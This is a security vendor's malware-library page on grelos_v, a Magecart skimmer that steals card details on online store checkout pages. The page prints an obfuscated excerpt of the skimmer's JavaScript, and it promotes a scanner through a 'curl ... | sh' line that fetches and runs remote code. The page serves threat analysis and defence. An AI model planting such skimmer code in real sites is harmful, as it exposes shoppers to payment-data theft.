Sansec logo

grelos_v (malware)

Sansec has collected and analyzed thousands of malware samples over the years. Find the most popular, malicious or just clever malware here.

Sansec Malware Library

What is grelos_v ?

Often found on online stores, grelos_v is a common digital skimmer (also known as Magecart) that was first detected on April 3rd, 2020. So far, Sansec has discovered this malware on 719 different victim stores. The most common attacked platform is Magento 1.

A typical sample of the malware in the wild can be observed when selecting "view page source" in your browser. It looks like this:

var grelos_v = {
'snd': null,
'Glink': _0x5a69('0x0', '(pkR'),
'myid': function(_0x1900b0) {
    var _0xf9d9d9 = document[_0x5a69('0x1', '6%!8')]['match'](new RegExp(_0x5a69('0x2', 'fcQ$') + _0x1900b0[_0x5a69('0x3', '6%!8')](/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\x5c$1') + _0x5a69('0x4', 'y%AX')));
    return _0xf9d9d9 ? decodeURIComponent(_0xf9d9d9[0x1]) : undefined;
}(_0x5a69('0x5', 'Tae*')) || function() {
    var _0x38567a = new Date();
    var _0x4d44f5 = _0x38567a[_0x5a69('0x6', 'ZtfC')]() + '-' + Math['floor'](Math[_0x5a69('0x7', 'KvjS')]() * (0x3b9ac9ff - 0xa98ac7 + 0x1) + 0xa98ac7);
    var _0x122e4a = new Date(new Date()[_0x5a69('0x8', 'yC#F')]() + 0x3c * 0x3c * 0x18 * 0x3e8);
    document[_0x5a69('0x9', '9HIN')] = _0x5a69('0xa', 'hEu9') + _0x4d44f5 + _0x5a69('0xb', 'L4WI') + _0x122e4a[_0x5a69('0xc', 'g1!R')]();
    return _0x4d44f5;
}(),

How does it work?

The grelos_v skimmer is loaded on the checkout page of a typical store. It lives in the browser of an unsuspecting online customer. Whenever he or she enters her payment information, the private data is siphoned off to an offshore server. Usually, this data is then sold on the dark web within 2-10 weeks.

This is one of the oldest skimmer types, and it has spawned many varieties, possibly by different creators. The origin of the name "grelos" is not clear, but it may refer to the Brazilian slang word for "money".

How to clean it?

The malware can be easily removed. It is usually hidden in a database field, such as core_config_data, cms_blocks or cms_pages. Sometimes the malware is appended to a specific .js code file. However just cleaning the malware is not enough: you need to discover the root cause of this malware, otherwise you will soon find the same malware back in your store.

Scan your store now
for malware & vulnerabilities

$ curl ecomscan.com | sh

eComscan is the most thorough security scanner for Magento, Adobe Commerce, Shopware, WooCommerce and many more.

Stay up to date with the latest eCommerce attacks

Sansec logo

experts in eCommerce security

Bluesky Telegram Linkedin Email RSS
Terms & Conditions
Privacy & Cookie Policy